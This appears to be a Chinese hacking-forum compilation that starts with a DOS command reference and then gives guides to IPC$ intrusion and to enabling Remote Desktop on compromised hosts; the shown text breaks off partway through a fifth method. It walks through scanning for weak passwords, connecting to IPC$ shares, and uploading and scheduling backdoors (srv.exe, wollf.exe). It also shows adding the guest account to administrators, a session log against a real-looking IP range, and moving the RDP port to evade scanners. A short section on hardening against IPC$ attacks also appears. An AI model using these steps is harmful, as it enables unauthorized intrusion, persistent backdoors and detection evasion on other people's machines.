想学好黑客的必看

黑夜幽靈

这些是我整理的一点基础知识,希望方便大家学习.在下面把所有楼层的内容列了出来,找自己需要的内容可以直接查找命令所在楼层。



2 楼： DOS常用命令
3 楼： IPC$命令详解
4 楼： ipc$常见问题
5 楼： 开启3389终端方法和常见问题
6 楼： 常见端口关闭方法

DOS 常用命令：

dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改号期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘

不常用DOS命令
diskcomp磁盘比较　 append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:

一、Dir

显示目录文件和子目录列表，呵呵，这个当然是人人要知道的。
可以使用通配符（? 和 *），？表通配一个字符，*表通配任意字符
*.后缀
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏，请按键盘上的任意键。
/w
以宽格式显示列表，在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt，包括子目录下文件。

二、Attrib

显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用，则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls

清除显示在命令提示符窗口中的所有信息，并返回空窗口，即“清屏”

四、Exit
退出当前命令解释程序并返回到系统。

五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录，但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。

六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
--------------------------------------------------------------------------------

2 没事来黑黑狼学技术的朋友，进来看看对你们有利无害
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg，后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面，但可以使用“网络连接”查看和更新 IP 地址。要做到这一点，请打开 网络连接，右键单击某一网络连接，单击“状态”，然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。

七、md
创建目录或子目录

八、Move
将一个或多个文件从一个目录移动到指定的目录。

九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表，其中，RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表，其名称由远程计算机的 IP 地址指定（以小数点分隔）。

十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息（对于 IP、ICMP、TCP 和 UDP 协议）以及 IPv6 统计信息（对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议）。使用时如果不带参数，netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数，ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息，请按 CTRL-BREAK。要中断并退出 ping，请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度（以字节表示）。默认值为 32。size 的最大值是 65,527。

十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba

十三、Set
显示、设置或删除环境变量。如果没有任何参数，set 命令将显示当前环境设置。

十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数，shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户，这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外，系统将忽略其它参数。在超时期间，您只可以使用 -a。

十五、System File Checker (sfc)
win下才有，在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存，并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小，以 MB 为单位。

十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件

十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。

十八、Xcopy
复制文件和目录，包括子目录。
/s
复制非空的目录和子目录。如果省略 /s，xcopy 将在一个目录中工作。
/e
复制所有子目录，包括空目录。
--------------------------------------------------------------------------------

3 没事来黑狼学技术的朋友，进来看看对你们有利无害

十九、copy
将一个或多个文件从一个位置复制到其他位置

二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多，这里不说了，不过这几个都是常用到的。




IPC$命令详解:

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!


二 什么是ipc$
IPC$(Internet Process Connection)是共享\"命名管道\"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表


三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.


四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
--------------------------------------------------------------------------------

4 没事来黑狼学技术的朋友，进来看看对你们有利无害

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)


五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上****作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。
关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了.


六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。


七 如何防范ipc$入侵
1禁止空连接进行枚举(此****作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。

--------------------------------------------------------------------------------

5 没事来黑狼学技术的朋友，进来看看对你们有利无害
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码


八 相关命令
1)建立空连接:
net use \\\\IP\\ipc$ \"\" /user:\"\" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\\\IP\\ipc$ \"用户名\" /user:\"密码\" (同样有3个空格)

3)映射默认共享:
net use z: \\\\IP\\c$ \"密码\" /user:\"用户名\" (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\\\IP\\c$

4)删除一个ipc$连接
net use \\\\IP\\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘，其他盘类推
net use * /del 删除全部,会有提示要求按y确认


九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

11. C:\\>net use \\\\127.0.0.1\\IPC$ \"密码\" /user:\"用户名\"
一般用流光，通过扫描弱口令来得到，管理员帐号和密码.
2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\\winnt\\system32\\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
　　
3. C:\\>net time \\\\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00，命令成功完成。
　　
4. C:\\>at \\\\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧

5. C:\\>net time \\\\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05，那就准备开始下面的命令。
　　
6. C:\\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
　　
7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
　　
8. C:\\WINNT\\system32>ntlm
输入ntlm启动（这里的C:\\WINNT\\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现\"DONE\"的时候，就说明已经启动正常。然后使用\"net start telnet\"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，****作就像在DOS上****作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\\>net user guest /active:yes
将对方的Guest用户激活

11. C:\\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\\>net localgroup administrators guest /add
将Guest变为Administrator(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)




ipc$常见问题:

1，怎样建立空连接，它有什么用？
答：使用命令 net use \\IPipc$ \"\" /user:\"\" 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。
对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。

2.为什么我连不上IPC$？
--------------------------------------------------------------------------------

6 没事来黑狼学技术的朋友，进来看看对你们有利无害
答：1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是： net use \\目标IPipc$ \"密码\" /user:\"用户名\"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用\"\"表示。

3，根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

4，关于ipc$连不上的问题比较复杂，没有总结出一个统一的认识，在肉鸡上实验有时会得出矛盾的结论，十分棘手。 而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。

5，怎样打开目标的IPC$？
答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）建议放弃。

6，怎样映射和访问默认共享？
答：使用命令 net use z: \\目标IPc$ \"密码\" /user:\"用户名\" 将对方的c盘映射为自己的z盘，其他盘类推。
如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copy muma.exe \\IPd$pathmuma.exe 。或者再映射也可以，只是不用用户名和密码了：net use y: \\IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时，须用\"\"将路径全引住。

7，如何删除映射和ipc$连接？
答：用命令 net use \\IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘，其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。

8，连上ipc$然后我能做什么？
答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。

9，怎样防止别人用ips$和默认共享入侵我？
答：A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1，先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………（有几个删几个）
2，禁止别人空连接
?? ?? 首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000002。
?? ? 3，禁止自动打开默认共享
?? ?? 对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。
--------------------------------------------------------------------------------

7 没事来黑狼学技术的朋友，进来看看对你们有利无害
对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）
net stop lanmanserver
可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙，或者端口过滤。






开启3389终端方法和常见问题:

第一种方法：

使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98****作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.


第二种方法：

进入后：TELNET上去！

c:\\>echo [Components] > c:\\rock
c:\\>echo TSEnable = on >> c:\\rock
c:\\>sysocmgr /i:c:\\winnt\\inf\\sysoc.inf /u:c:\\rock /q
或者！
c:\\>echo [Components] > d:\\wawa
c:\\>echo TSEnable = on >> d:\\wawa
c:\\>sysocmgr /i:c:\\winnt\\inf\\sysoc.inf /u:d:\\wawa /q
等会自动启后就OK


或者：
在本地利用DOS命令edit建立.bat后缀批处理文件（文件名随意） echo [Components] > c:\\sql

echo TSEnable = on >>

c:\\sqlsysocmgr /i:c:\\winnt\\inf\\sysoc.inf /u:c:\\sql /q

net use \\\\ip地址\\ipc$ 密码 /user:用户名（一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\\xxx.bat \\\\ip地址\\$c:\\winnt

at time 00:00:00 xxx.bat

服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！


第三种方法：

进入后,再次检查终端组件是否安装:
c:\\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\\>dir c:\\sysoc.inf /s file://检查INF文件的位置
c:\\WINNT\\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\\> dir c:\\sysocmgr.* /s file://检查组件安装程序
c:\\WINNT\\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\\>echo [Components] > c:\\rock
c:\\>echo TSEnable = on >> c:\\rock
file://这是建立无人参与的安装参数
--------------------------------------------------------------------------------

8 没事来黑狼学技术的朋友，进来看看对你们有利无害
c:\\>type c:\\rock
[Components]
TSEnable = on
file://检查参数文件
------------------------------------------------------
c:\\>sysocmgr /i:c:\\winnt\\inf\\sysoc.inf /u:c:\\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议.


第四种方法：


C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net use \\\\218.22.155.*\\ipc$ \"\" /us
er:administrator----------------连接成功！
命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy wollf.exe \\\\218.22.155.*\\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy hbulot.exe \\\\218.22.155.*\\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net time \\\\218.22.155.*
\\\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>at \\\\218.22.155.* 06:39 wollf.exe
新加了一项作业，其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------
说明：
wollf.exe是一个后门程序，很多高手都喜欢nc或者winshell，不过我对他情有独钟！在这里我只介绍与本文内

容有关的命令参数，它的高级用法不做补充。
hbulot.exe是用于开启3389服务，如果不是server及以上版本，就不要运行了。因为pro版不能安装终端服务。
2分钟后......


---------------------------------------------------
C:\\Documents and Settings\\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
\"Wollf Remote Manager\" v1.6
Code by wollf, http://www.xfocus.org
---------------------------------------------------
说明：
使用wollf连接时要注意wollf.exe要在当前目录，它的连接命令格式：wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上，说明你已经连接成功，并具有管理员administrator权限。

----------------------------------------------------
[server@D:\\WINNT\\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
-----------------------------------------------------
说明：
输入dos,你就会进入目标机的cmd下，这时同样具有administrator权限。


----------------------------------------------------
D:\\WINNT\\system32>cd..
cd..

D:\\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:\\WINNT 的目录

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
--------------------------------------------------------------------------------

9 没事来黑狼学技术的朋友，进来看看对你们有利无害
1 个目录 9,049,604,096 可用字节

D:\\WINNT>hbulot
hbulot
---------------------------------------------------
说明：
因为我们把HBULOT.exe放到目标机的admin$下的，所以先找到它，以上是文件的存放位置。


D:\\WINNT>exit
exit

Command \"DOS\" succeed.

[server@D:\\WINNT\\system32]#reboot


Command \"REBOOT\" succeed.

[server@D:\\WINNT\\system32]#
Connection closed.
------------------------------------------------
说明：
由dos退到wollf的连接模式下用exit命令，HBULOT.exe运行后需重新启动方可生效，这里wollf自带的REBOOT
命令，执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放，方法很多，superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本，就不要运行了。因为pro版不能安装

终端服务。

到这里，你已经拥有3389肉鸡了！但是会不会被别的入侵者发现呢？下面所教的就是怎么让3389只为你服务！

我们现在使用的3389登陆器有两种版本，一种是2000/98，一种是XP。二者区别呢？前者使用的默认端口3389对

目标，后者默认的也是3389端口，但是它还支持别的端口进行连接！所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描！修改方法如下：
修改服务器端的端口设置 ，注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如1314
第二个地方：
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
PortNumber值，默认是3389，修改成所希望的端口，比如1314
现在这样就可以了。重启系统吧。
注意：事实上，只修改第二处也是可以的。另外，第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后，看看端口有没有改。
小技巧：修改注册表键值时，先选择10进制，输入你希望的端口数值，再选择16进制，系统会自动转换。


第五种方法：


一.原理性基本安装
1.将如下注册表键值导入 \"肉机\" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache]
\"Enabled\"=\"0\"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]
\"ShutdownWithoutLogon\"=\"0\"

